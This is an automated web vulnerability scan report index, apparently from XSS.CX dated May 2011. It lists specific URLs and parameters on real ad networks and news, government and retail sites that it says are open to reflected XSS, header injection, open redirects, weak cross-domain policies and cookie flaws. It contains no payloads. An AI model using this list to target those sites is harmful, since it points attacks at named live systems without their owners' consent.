XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 10:47:30 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]

2.32. http://ads.bridgetrack.com/a/f/ [click parameter]

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]

2.53. http://choices.truste.com/ca [c parameter]

2.54. http://choices.truste.com/ca [h parameter]

2.55. http://choices.truste.com/ca [iplc parameter]

2.56. http://choices.truste.com/ca [ox parameter]

2.57. http://choices.truste.com/ca [plc parameter]

2.58. http://choices.truste.com/ca [w parameter]

2.59. http://choices.truste.com/ca [zi parameter]

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]

2.73. http://event.adxpose.com/event.flow [uid parameter]

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

2.92. http://ib.adnxs.com/ab [cnd parameter]

2.93. http://ib.adnxs.com/ptj [redir parameter]

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]

2.104. http://radar.weather.gov/radar.php [product parameter]

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]

2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]

2.159. http://ib.adnxs.com/acb [acb145072 cookie]

2.160. http://ib.adnxs.com/acb [acb893170 cookie]

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]

3. Flash cross-domain policy

3.1. http://a.collective-media.net/crossdomain.xml

3.2. http://a1.interclick.com/crossdomain.xml

3.3. http://action.mathtag.com/crossdomain.xml

3.4. http://ad.amgdgt.com/crossdomain.xml

3.5. http://ad.doubleclick.net/crossdomain.xml

3.6. http://ads.pointroll.com/crossdomain.xml

3.7. http://amch.questionmarket.com/crossdomain.xml

3.8. http://analytics.newsinc.com/crossdomain.xml

3.9. http://ar.voicefive.com/crossdomain.xml

3.10. http://assets1.grouponcdn.com/crossdomain.xml

3.11. http://at.amgdgt.com/crossdomain.xml

3.12. http://b.scorecardresearch.com/crossdomain.xml

3.13. http://b.voicefive.com/crossdomain.xml

3.14. http://b3.mookie1.com/crossdomain.xml

3.15. http://bh.contextweb.com/crossdomain.xml

3.16. http://bs.serving-sys.com/crossdomain.xml

3.17. http://cache-01.cleanprint.net/crossdomain.xml

3.18. http://cdn.gigya.com/crossdomain.xml

3.19. http://cdn.interclick.com/crossdomain.xml

3.20. http://cdn.taboolasyndication.com/crossdomain.xml

3.21. http://cr0.worthathousandwords.com/crossdomain.xml

3.22. http://d7.zedo.com/crossdomain.xml

3.23. http://ds.serving-sys.com/crossdomain.xml

3.24. http://event.adxpose.com/crossdomain.xml

3.25. http://finance.fox8live.com/crossdomain.xml

3.26. http://fls.doubleclick.net/crossdomain.xml

3.27. http://fw.adsafeprotected.com/crossdomain.xml

3.28. http://gannett.gcion.com/crossdomain.xml

3.29. http://gscounters.gigya.com/crossdomain.xml

3.30. http://ib.adnxs.com/crossdomain.xml

3.31. http://ic.nexac.com/crossdomain.xml

3.32. http://idcs.interclick.com/crossdomain.xml

3.33. http://k.collective-media.net/crossdomain.xml

3.34. http://log30.doubleverify.com/crossdomain.xml

3.35. http://map.media6degrees.com/crossdomain.xml

3.36. http://metrics.csmonitor.com/crossdomain.xml

3.37. http://metrics.npr.org/crossdomain.xml

3.38. http://mobile.fox8live.com/crossdomain.xml

3.39. http://pix04.revsci.net/crossdomain.xml

3.40. http://pixel.quantserve.com/crossdomain.xml

3.41. http://radar.weather.gov/crossdomain.xml

3.42. http://s.meebocdn.net/crossdomain.xml

3.43. http://s0.2mdn.net/crossdomain.xml

3.44. http://secure-us.imrworldwide.com/crossdomain.xml

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml

3.46. http://spd.pointroll.com/crossdomain.xml

3.47. http://speed.pointroll.com/crossdomain.xml

3.48. http://stp.fox8live.com/crossdomain.xml

3.49. http://t.mookie1.com/crossdomain.xml

3.50. http://t.pointroll.com/crossdomain.xml

3.51. http://trc.taboolasyndication.com/crossdomain.xml

3.52. http://usatoday1.112.2o7.net/crossdomain.xml

3.53. http://va.px.invitemedia.com/crossdomain.xml

3.54. http://w10.localadbuy.com/crossdomain.xml

3.55. http://widget.newsinc.com/crossdomain.xml

3.56. http://wvue.web.entriq.net/crossdomain.xml

3.57. http://www.fox8live.com/crossdomain.xml

3.58. http://www.groupon.com/crossdomain.xml

3.59. https://www.groupon.com/crossdomain.xml

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml

3.61. http://adadvisor.net/crossdomain.xml

3.62. http://ads.bridgetrack.com/crossdomain.xml

3.63. http://content.usatoday.com/crossdomain.xml

3.64. http://contextweb.usatoday.net/crossdomain.xml

3.65. http://data.usatoday.net/crossdomain.xml

3.66. http://googleads.g.doubleclick.net/crossdomain.xml

3.67. http://i.usatoday.net/crossdomain.xml

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml

3.69. http://pagead2.googlesyndication.com/crossdomain.xml

3.70. http://pubads.g.doubleclick.net/crossdomain.xml

3.71. http://rd.meebo.com/crossdomain.xml

3.72. http://share.meebo.com/crossdomain.xml

3.73. http://static.ak.fbcdn.net/crossdomain.xml

3.74. http://syndication.mmismm.com/crossdomain.xml

3.75. http://videos.usatoday.net/crossdomain.xml

3.76. http://www.collegesurfing.com/crossdomain.xml

3.77. http://www.facebook.com/crossdomain.xml

3.78. http://www.meebo.com/crossdomain.xml

3.79. http://www.npr.org/crossdomain.xml

3.80. http://www.usatoday.com/crossdomain.xml

3.81. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ads.pointroll.com/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://content.usatoday.com/clientaccesspolicy.xml

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml

4.7. http://data.usatoday.net/clientaccesspolicy.xml

4.8. http://i.usatoday.net/clientaccesspolicy.xml

4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml

4.10. http://metrics.npr.org/clientaccesspolicy.xml

4.11. http://s0.2mdn.net/clientaccesspolicy.xml

4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

4.13. http://spd.pointroll.com/clientaccesspolicy.xml

4.14. http://speed.pointroll.com/clientaccesspolicy.xml

4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

4.16. http://www.usatoday.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.therepublic.com/login/

5.2. http://www.therepublic.com/login/register/

6. SSL cookie without secure flag set

6.1. https://shop.npr.org/index.php

6.2. https://www.groupon.com/dallas/

6.3. https://www.groupon.com/learn

6.4. https://www.groupon.com/login

6.5. https://www.groupon.com/mobile

6.6. https://www.groupon.com/users

6.7. https://www.groupon.com/users/new

7. Session token in URL

7.1. http://login.npr.org/openid/embed

7.2. http://www.facebook.com/extern/login_status.php

7.3. http://www.npr.org/templates/reg/login.php

8. ASP.NET ViewState without MAC enabled

8.1. http://mobile.fox8live.com/BlackBerry/default.aspx

8.2. http://mobile.fox8live.com/business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

8.3. http://mobile.fox8live.com/default.aspx

8.4. http://mobile.fox8live.com/news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.5. http://mobile.fox8live.com/news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

8.6. http://mobile.fox8live.com/sports/default.aspx

8.7. http://mobile.fox8live.com/sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

8.8. http://mobile.fox8live.com/weather/default.aspx

8.9. http://www.fox8live.com/business/default.aspx

8.10. http://www.fox8live.com/business/iframe_financialticker.aspx

8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx

8.12. http://www.fox8live.com/content/aboutus/default.aspx

8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

8.14. http://www.fox8live.com/content/news/seregni/default.aspx

8.15. http://www.fox8live.com/content/news/watercooler/default.aspx

8.16. http://www.fox8live.com/default.aspx

8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx

8.18. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.19. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

8.20. http://www.fox8live.com/rss/default.aspx

8.21. http://www.fox8live.com/widgets/serve.aspx

8.22. http://www.fox8live.com/wireless/default.aspx

9. Open redirection

9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]

9.2. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]

9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]

9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]

9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]

9.7. https://www.groupon.com/users [Referer HTTP header]

10. Cookie scoped to parent domain

10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

10.2. http://t.mookie1.com/t/v1/imp

10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

10.4. http://a1.interclick.com/ColDta.aspx

10.5. http://ad.amgdgt.com/ads/

10.6. http://ad.doubleclick.net/clk

10.7. http://ads.pointroll.com/PortalServe/

10.8. http://ads.revsci.net/adserver/ako

10.9. http://ads.revsci.net/adserver/ako

10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

10.11. http://ar.voicefive.com/b/wc_beacon.pli

10.12. http://ar.voicefive.com/bmx3/broker.pli

10.13. http://at.amgdgt.com/ads/

10.14. http://b.scorecardresearch.com/b

10.15. http://b.scorecardresearch.com/p

10.16. http://b.voicefive.com/b

10.17. http://bh.contextweb.com/bh/rtset

10.18. http://bidder.mathtag.com/iframe/notify

10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

10.22. http://ib.adnxs.com/ab

10.23. http://ib.adnxs.com/acb

10.24. http://ib.adnxs.com/getuid

10.25. http://ib.adnxs.com/ptj

10.26. http://ib.adnxs.com/ptj

10.27. http://ib.adnxs.com/ptj

10.28. http://ib.adnxs.com/seg

10.29. http://idcs.interclick.com/Segment.aspx

10.30. http://image2.pubmatic.com/AdServer/Pug

10.31. http://leadback.advertising.com/adcedge/lb

10.32. http://map.media6degrees.com/orbserv/hbpix

10.33. http://odb.outbrain.com/utils/get

10.34. http://odb.outbrain.com/utils/get

10.35. http://odb.outbrain.com/utils/ping.html

10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js

10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

10.42. http://r.openx.net/set

10.43. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

10.44. http://segment-pixel.invitemedia.com/pixel

10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

10.50. http://syndication.mmismm.com/tntwo.php

10.51. http://tacoda.at.atwola.com/rtx/r.js

10.52. http://tags.bluekai.com/site/3775

10.53. http://tags.bluekai.com/site/3869

10.54. http://trgc.opt.fimserve.com/fp.gif

10.55. http://trgca.opt.fimserve.com/fp.gif

10.56. http://va.px.invitemedia.com/adnxs_imp

10.57. http://www.groupon.com/dallas/

10.58. http://www.groupon.com/learn

10.59. http://www.groupon.com/mobile

10.60. http://www.groupon.com/privacy

10.61. http://www.groupon.com/subscriptions/new

10.62. https://www.groupon.com/dallas/

10.63. https://www.groupon.com/learn

10.64. https://www.groupon.com/login

10.65. https://www.groupon.com/mobile

10.66. https://www.groupon.com/users

10.67. https://www.groupon.com/users/new

10.68. http://www.tinbuadserv.com/v3/serve.php

11. Cookie without HttpOnly flag set

11.1. http://ads.adxpose.com/ads/ads.js

11.2. http://beacon-1.newrelic.com/1/fffa2293e6

11.3. http://event.adxpose.com/event.flow

11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

11.5. http://shop.npr.org/

11.6. https://shop.npr.org/index.php

11.7. http://t.mookie1.com/t/v1/imp

11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json

11.9. http://widgets.macroaxis.com/widgets/content.jsp

11.10. http://www.macroaxis.com/widgets/url.jsp

11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.12. http://a1.interclick.com/ColDta.aspx

11.13. http://a1.interclick.com/getInPageJSProcess.aspx

11.14. http://ad.amgdgt.com/ads/

11.15. http://ad.doubleclick.net/clk

11.16. http://ad.yieldmanager.com/pixel

11.17. http://ads.bridgetrack.com/a/f/

11.18. http://ads.pointroll.com/PortalServe/

11.19. http://ads.revsci.net/adserver/ako

11.20. http://ads.revsci.net/adserver/ako

11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

11.23. http://ar.voicefive.com/b/wc_beacon.pli

11.24. http://ar.voicefive.com/bmx3/broker.pli

11.25. http://at.amgdgt.com/ads/

11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

11.27. http://b.scorecardresearch.com/b

11.28. http://b.scorecardresearch.com/p

11.29. http://b.voicefive.com/b

11.30. http://bh.contextweb.com/bh/rtset

11.31. http://bidder.mathtag.com/iframe/notify

11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

11.35. http://idcs.interclick.com/Segment.aspx

11.36. http://image2.pubmatic.com/AdServer/Pug

11.37. http://leadback.advertising.com/adcedge/lb

11.38. http://map.media6degrees.com/orbserv/hbpix

11.39. http://odb.outbrain.com/utils/get

11.40. http://odb.outbrain.com/utils/get

11.41. http://odb.outbrain.com/utils/ping.html

11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

11.48. http://r.openx.net/set

